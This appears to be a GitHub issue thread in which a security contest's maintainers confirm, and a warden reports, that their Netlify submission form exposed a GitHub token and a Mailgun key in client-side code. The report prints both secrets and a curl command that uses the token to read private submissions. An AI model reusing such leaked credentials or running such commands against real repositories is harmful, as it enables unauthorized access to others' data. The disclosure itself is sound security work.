Closed code423n4 closed 3 years ago
Keys are disabled and I'm working on mitigating this. These keys were set in netlify and createIssue.js
should be running as a lambda function... so I'm a bit concerned here about either my understanding of netlify's lambda function setup or netlify's security or both.
Told wardens to standby for a new process for submissions.
There are two problems:
src
directory, netlify will go ahead and add your environment variables in plain text and deploy them as part of your site. :joy:Working on updates.
In the meantime, I have taken the form offline and instructed wardens to keep their own notes on vulnerabilities until the form is ready for submissions.
@werg @marginswapper @zscole This is now resolved. Or should be, at least!
Form is back online at https://c4-marginswap.netlify.app/
Email address
mail@gpersoon.com
Handle
gpersoon
Eth address
0x8e2A89fF2F45ed7f8C8506f846200D671e2f176f
Vulnerability details
The github token can be retrieved from the https://c4-marginswap.netlify.app/ website
Proof of concept
In the source of the website (createIssue.js) you can see github is directly accessed from the website. With Fiddler you can search for GITHUB and see: REACT_APP_MAILGUN_DOMAIN:"mg.code423n4.com", REACT_APP_MAILGUN_KEY:"a9763c0878cd90413bf11615456692e7-b6d086a8-be1c8bad", REACT_APP_GITHUB_TOKEN:"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"
With Fiddler you can search for code-423n4 and see: "owner":"code-423n4", "repo":"marginswap-results"
With the GITHUB token you can retrieve the issues: curl -H "Authorization: token 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" https://api.github.com/repos/code-423n4/marginswap-results/issues
This shows: "body": "# Email address\n\nadam@andyet.com\n\n\n# Handle\n\nadamavenir\n\n\n# Eth address\n\n123123123\n\n\n# Vulnerability details\n\nSome details:\n\n
\ndetails(schemtails)\n
\n\n\n# Impact\n\nBrace for it!\n\n\n# Proof of concept\n\n- proof\n- of \n- concept\n\n\n# Tools used\n\nI used no tools except this form and my BARE HANDS!\n\n\n# Recommended mitigation steps\n\nI would recommend not doing this bug.\n\n",Impact
With the token you can access the submissions of others and share in their prices.
Tools used
Fiddler (https://www.telerik.com/) And the developer console of Chrome to look at the source.
Recommended mitigation steps
Either open source the bug submission enterly Or split the bug submission application in two parts, where only a backend has the Github keys and does the creating of the issues.
There are tools that promise to do this, i haven't looked into them: https://fire.fundersclub.com/ https://zapier.com/apps/github/integrations/gmail/10314/create-github-issues-from-new-emails-on-gmail-business-gmail-accounts-only https://flow.microsoft.com/en-us/galleries/public/templates/6b590f10bc9011e6b2e2c98b01575bae/send-an-email-to-create-github-issues/